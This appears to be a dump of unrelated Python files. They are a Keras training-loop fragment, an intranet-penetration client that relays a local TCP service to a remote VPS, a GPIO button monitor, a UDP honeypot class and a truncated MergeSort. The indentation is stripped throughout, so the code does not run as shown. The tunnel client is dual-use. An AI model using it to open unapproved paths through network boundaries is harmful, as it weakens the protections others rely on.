outs = f(ins_batch)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if batch_index == len(batches) - 1: # last batch
# validation
if do_validation:
# replace with self._evaluate
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) != list:
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (nb_sample,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=K.floatx()))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) == list:
if batch_index == 0:
for batch_out in enumerate(batch_outs):
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i, out in enumerate(outs):
outs[i] /= nb_sample
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_dim=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise Exception('You must compile a model before training/testing.'
' Use `model.compile(optimizer, loss)`.')
output_shapes = []
for output_shape, loss_fn in zip(self.internal_output_shapes, self.loss_functions):
if loss_fn.__name__ == 'sparse_categorical_crossentropy':
output_shapes.append(output_shape[:-1] + (1,))
elif getattr(objectives, loss_fn.__name__, None) is None:
output_shapes.append(None)
else:
output_shapes.append(output_shape)
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False,
exception_prefix='model input')
y = standardize_input_data(y, self.output_names,
output_shapes,
check_batch_dim=False,
exception_prefix='model target')
sample_weights = standardize_sample_weights(sample_weight,
self.output_names)
class_weights = standardize_class_weights(class_weight,
self.output_names)
sample_weights = [standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self.sample_weight_modes)]
check_array_lengths(x, y, sample_weights)
check_loss_and_target_compatibility(y, self.loss_functions, self.internal_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def fit(self, x, y, batch_size=32, nb_epoch=10, verbose=1, callbacks=[],
validation_split=0., validation_data=None, shuffle=True,
class_weight=None, sample_weight=None):
'''Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
nb_epoch: integer, the number of times to iterate over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode. 0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate the loss and any model metrics
at the end of each epoch. The model will not be trained on this data.
This could be a tuple (x_val, y_val) or a tuple (val_x, val_y, val_sample_weights).
shuffle: boolean, whether to shuffle the training data before each epoch.
class_weight: optional dictionary mapping class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare validation data
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y,
sample_weight=val_sample_weight,
check_batch_dim=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (slice_X(x, 0, split_at), slice_X(x, split_at))
y, val_y = (slice_X(y, 0, split_at), slice_X(y, split_at))
sample_weights, val_sample_weights = (
slice_X(sample_weights, 0, split_at), slice_X(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# prepare input arrays and training function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# prepare display labels
out_labels = self.metrics_names
# rename duplicated metrics name
# (can happen with an output layer shared among multiple dataflows)
deduped_out_labels = []
for i, label in enumerate(out_labels):
new_label = label
if out_labels.count(label) > 1:
dup_idx = out_labels[:i].count(label)
new_label += '_' + str(dup_idx + 1)
deduped_out_labels.append(new_label)
out_labels = deduped_out_labels
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# delegate logic to _fit_loop
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
'''Returns the loss value and metrics values for the model
in test mode. Computation is done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare inputs, delegate logic to _test_loop
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
'''Generates output predictions for the input samples,
processing the samples in a batched way.
# Arguments
x: the input data, as a Numpy array
(or list of Numpy arrays if the model has multiple outputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
A Numpy array of predictions.
'''
# validate user data
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# prepare inputs, delegate logic to _predict_loop
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
'''Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=True)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def test_on_batch(self, x, y, sample_weight=None):
'''Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=True)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
'''Returns predictions for a single batch of samples.
'''
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
verbose=1, callbacks=[],
validation_data=None, nb_val_samples=None,
class_weight={}, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Fits the model on data generated batch-by-batch by
a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `samples_per_epoch`
samples have been seen by the model.
samples_per_epoch: integer, number of samples to process before
going to the next epoch.
nb_epoch: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
nb_val_samples: only relevant if `validation_data` is a generator.
number of samples to use from validation generator
at the end of every epoch.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
samples_per_epoch=10000, nb_epoch=10)
```
'''
wait_time = 0.01 # in seconds
epoch = 0
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not nb_val_samples:
raise Exception('When using a generator for validation data, '
'you must specify a value for "nb_val_samples".')
out_labels = self.metrics_names
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'nb_epoch': nb_epoch,
'nb_sample': samples_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation and not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise Exception('validation_data should be a tuple '
'(val_x, val_y, val_sample_weight) '
'or (val_x, val_y). Found: ' + str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y, val_sample_weight)
self.validation_data = val_x + [val_y, val_sample_weights]
else:
self.validation_data = None
# start generator thread storing batches into a queue
data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
callback_model.stop_training = False
while epoch < nb_epoch:
callbacks.on_epoch_begin(epoch)
samples_seen = 0
batch_index = 0
while samples_seen < samples_per_epoch:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
# build batch logs
batch_logs = {}
if type(x) is list:
batch_size = x[0].shape[0]
elif type(x) is dict:
batch_size = list(x.values())[0].shape[0]
else:
batch_size = x.shape[0]
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
try:
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
except:
_stop.set()
raise
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# construct epoch logs
epoch_logs = {}
batch_index += 1
samples_seen += batch_size
# epoch finished
if samples_seen > samples_per_epoch:
warnings.warn('Epoch comprised more than '
'`samples_per_epoch` samples, '
'which might affect learning results. '
'Set `samples_per_epoch` correctly '
'to avoid this warning.')
if samples_seen >= samples_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(validation_data,
nb_val_samples,
max_q_size=max_q_size)
else:
# no need for try/except because
# data has already been validated
val_outs = self.evaluate(val_x, val_y,
batch_size=batch_size,
sample_weight=val_sample_weights,
verbose=0)
if type(val_outs) is not list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
_stop.set()
if pickle_safe:
data_gen_queue.close()
callbacks.on_train_end()
return self.history
def evaluate_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Evaluates the model on a data generator. The generator should
return the same kind of data as accepted by `test_on_batch`.
Arguments:
generator:
generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
val_samples:
total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
self._make_test_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
weights = []
data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
try:
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
except:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
all_outs.append(outs)
processed_samples += nb_samples
weights.append(nb_samples)
_stop.set()
if pickle_safe:
data_gen_queue.close()
if type(outs) is not list:
return np.average(np.asarray(all_outs),
weights=weights)
else:
averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=weights))
return averages
def predict_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: generator yielding batches of input samples.
val_samples: total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
Numpy array(s) of predictions.
'''
self._make_predict_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
else:
x = generator_output
try:
outs = self.predict_on_batch(x)
except:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
if type(outs) != list:
outs = [outs]
if len(all_outs) == 0:
for out in outs:
shape = (val_samples,) + out.shape[1:]
all_outs.append(np.zeros(shape, dtype=K.floatx()))
for i, out in enumerate(outs):
all_outs[i][processed_samples:(processed_samples + nb_samples)] = out
processed_samples += nb_samples
_stop.set()
if pickle_safe:
data_gen_queue.close()
if len(all_outs) == 1:
return all_outs[0]
return all_outs
|
InternalMain.py | '''
@desc:内网穿透(映射)客户端 部署在内网
@author: Martin Huang
@time: created on 2019/6/14 20:43
@修改记录:
2019/07/12 => 增加DEBUG选项 默认False 改为True可显示更多信息
'''
import select
import socket
import time
from threading import Thread
from Utils.ConversionUtils import ConversionUtils
#pycharm
#from src.main.Utils.IOUtils import *
#调试参数
DEBUG = False
class MappingClient:
def __init__(self,fromIP,fromPort,type,remoteIp,remotePort):
#远程VPS的IP地址
self.remoteIp = remoteIp
#远程VPS数据监听端口
self.remotePort = remotePort
#源/本地ip
self.fromIP = fromIP
#源/本地端口
self.fromPort = fromPort
#clientA->连接内网App
self.clientA = None
#clientB->连接VPS
self.clientB = None
#select监听的可读列表、可写列表、错误列表
self.readableList = []
#协议类型
self.type = type
#连接内网App
def connectClientA(self):
if not self.clientA:
self.clientA = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.clientA.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
self.clientA.connect((self.fromIP,self.fromPort))
print('clientA Connected!')
#将clientA添加进监听可读队列
self.readableList.append(self.clientA)
#连接VPS
def connectClientB(self):
if not self.clientB:
self.clientB = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.clientB.setsockopt(socket.SOL_SOCKET,socket.SO_KEEPALIVE,1)
self.clientB.connect((self.remoteIp, self.remotePort))
print('clientB Connected!')
# 将client添加进监听可读队列
self.readableList.append(self.clientB)
#关闭clientA
def closeClintA(self):
#先将clientA从监听队列中移除,再关闭,否则会有异常,clientB同理
if self.clientA in self.readableList:
self.readableList.remove(self.clientA)
self.clientA.shutdown(2)
self.clientA = None
print('ClintA Closed!')
def closeClintB(self):
if self.clientB in self.readableList:
self.readableList.remove(self.clientB)
self.clientB.shutdown(2)
self.clientB = None
print('ClintB Closed!')
#端口映射
def TCPMapping(self):
#连接内网App和外网VPS
self.connectClientA()
self.connectClientB()
while True:
#使用select监听
rs, ws, es = select.select(self.readableList, [], [])
for each in rs:
#如果当前可读对象为clientA,将读取的数据转发到clientB,若遇到异常/无数据则关闭连接
if each == self.clientA:
try:
tdataA = each.recv(1024)
self.clientB.send(tdataA)
except ConnectionResetError as e:
if DEBUG:
print(e)
self.closeClintA()
return
#print(tdataA)
if not tdataA:
if self.clientA is not None:
self.closeClintA()
self.closeClintB()
return
# 如果当前可读对象为clientB,将读取的数据转发到clientA,若遇到异常/无数据则关闭连接
elif each == self.clientB:
try:
tdataB = each.recv(1024)
self.clientA.send(tdataB)
except ConnectionResetError:
self.closeClintA()
return
#print(tdataB)
#若收到外部用户意外中断信息,关闭全部连接,结束
if tdataB == bytes('NODATA',encoding='utf-8'):
self.closeClintA()
self.closeClintB()
return
if not tdataB:
self.closeClintA()
self.closeClintB()
return
#主方法
def InternalMain(remoteIP,commonPort,remotePort,localIp,localPort):
#remoteIP ->远程VPS的IP地址
#commonPort -> 心跳检测端口
#remotePort -> 远程VPS数据监听端口
#localIp -> 本地IP
#localPort -> 本地端口
#clientC专门与远程VPS做心跳
clientC = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientC.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
clientC.connect((remoteIP, commonPort))
rl = [clientC]
#监听
while True:
rs, ws, es = select.select(rl, [], [])
for each in rs:
if each == clientC:
tdataC = each.recv(1024)
if not tdataC:
rl.remove(clientC)
clientC.close()
clientC.connect((remoteIP, commonPort))
rl = [clientC]
break
if DEBUG:
print(tdataC)
#若远程VPS接收到用户访问请求,则激活一个线程用于处理
if tdataC == bytes('ACTIVATE',encoding='utf-8'):
b = bytes('OK', encoding='utf-8')
each.send(b)
foo = MappingClient(localIp,localPort,'tcp',remoteIP,remotePort)
t = Thread(target=foo.TCPMapping)
t.setDaemon(True)
t.start()
#心跳检测
elif tdataC == bytes('IAMALIVE',encoding='utf-8'):
b = bytes('OK', encoding='utf-8')
each.send(b) |
buttonthread.py | # -*- coding: utf-8 -*-
# Copyright (c) 2018 Steven P. Goldsmith
# See LICENSE.md for details.
"""
Use a thread to monitor edge events in background
-------------
Should work on any board with a button built in. Just change chip and line
value as needed.
"""
import sys, time, threading, gpiod
from argparse import *
class buttonthread:
def __init__(self, chip):
"""Initialize GPIO chip.
"""
self.chip = gpiod.Chip(chip, gpiod.Chip.OPEN_BY_NUMBER)
def wait_for_edge(self, line, timeoutSecs):
print("Thread start")
button_line = self.chip.get_line(line)
button_line.request(consumer=sys.argv[0][:-3], type=gpiod.LINE_REQ_EV_BOTH_EDGES)
while button_line.event_wait(sec=timeoutSecs):
event = button_line.event_read()
if event.type == gpiod.LineEvent.RISING_EDGE:
print("Rising edge timestamp %s" % time.strftime('%m/%d/%Y %H:%M:%S', time.localtime(event.sec)))
elif event.type == gpiod.LineEvent.FALLING_EDGE:
print("Falling edge timestamp %s" % time.strftime('%m/%d/%Y %H:%M:%S', time.localtime(event.sec)))
else:
raise TypeError('Invalid event type')
print("Thread exit")
def main(self, line):
"""Use thread to wait for edge events while main method does other stuff.
"""
print("Name: %s, label: %s, lines: %d" % (self.chip.name(), self.chip.label(), self.chip.num_lines()))
# Kick off thread
thread = threading.Thread(target=self.wait_for_edge, args=(line, 15,))
thread.start()
count = 0
# Just simulating main program doing something else
while count < 30 and thread.isAlive():
print("Main program doing stuff, press button")
time.sleep(1)
count += 1
# If thread is still alive wait for it to time out
if thread.isAlive():
print("Waiting for thread to exit, stop pressing button for 5 seconds")
thread.join()
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--chip", help="GPIO chip number (default 1 '/dev/gpiochip1')", type=str, default="1")
parser.add_argument("--line", help="GPIO line number (default 3 button on NanoPi Duo)", type=int, default=3)
args = parser.parse_args()
obj = buttonthread(args.chip)
obj.main(args.line)
|
genericpot.py | #!/usr/bin/env python3
import os
import signal
import threading
from . import generic
import core.potloader as potloader
import core.utils as utils
from .dblogger import DBThread
class GenericPot(potloader.PotLoader):
""" Implementation of generic honeypot that listens on an arbitrary UDP port
and responds with a random response of a given size or with a predefined pattern.
"""
def name(self):
return 'generic'
def _create_server(self):
return generic.create_server(
self.conf,
self.name(),
self.log_queue,
self.output_queue,
self.hpfeeds_client,
self.alerter
)
def _create_dbthread(self, dbfile, new_attack_interval):
return DBThread(
dbfile,
self.name(),
self.log_queue,
self.output_queue,
self.stop_event,
new_attack_interval
)
def _start_server(self):
self.server.serve_forever()
def _get_config_path(self):
return os.path.join(os.path.dirname(__file__), 'genericpot.conf')
def _detailed_status(self, status):
port = self.server.server_address[1]
avg_amp = float('{0:.2f}'.format(status['avg_amp']))
pkt_in_bytes = utils.format_unit(status['packets_in_bytes'])
stats = [
['Average amplification', utils.sep_thousand(avg_amp)],
['Traffic IN/OUT', pkt_in_bytes],
]
return stats
# override of default function for obtaining payload inside status structure
# setup function is generic enough for display, but since generic honeypot is
# port-specific, return structure for the currently bound port
def _extract_status_payload(self, stats):
port = self.server.server_address[1]
payload = stats['payload']
if port in payload:
port_stats = payload[port]
specific = payload['specific']
port_stats['specific'] = {
'avg_amp': specific['avg_amp'][port],
'packets_in_bytes': specific['packets_in_bytes'][port]
}
return port_stats
else:
utils.print_warn('Port %d not found in the database, statistics not available' % (port))
# set total_attacks parameter to zero in order to signal empty statistics table
return {'total_attacks': 0}
if __name__ == "__main__":
genericpot = GenericPot()
genericpot.setup()
t = threading.Thread(target=genericpot.run)
t.start()
genericpot.potthread = t
signal.signal(signal.SIGINT, genericpot.shutdown_signal_wrapper)
signal.pause()
|
MergeSort.py | from Algorithims import Algorithms
import time
import threading
class MergeSort(Algorithms):
def __init__(self, data, delay):
Algorithms.__init__(self)
self.data = data
self.delay = delay
sorting_thread = threading.Thread(target=self.sort, args=(self.data, self.drawData, self.delay))
sorting_thread.daemon = True
sorting_thread.start()
self.mainloop()
def sort(self, data, drawData, delay):
self.algorithm(data, 0, len(data) - 1, drawData, delay)
drawData(data, ["green" for x in range(len(data))])
print data
def algorithm(self, data, left, right, drawData, delay):
if left < right:
middle = (left + right) // 2
self.algorithm(data, left, middle, drawData, delay)
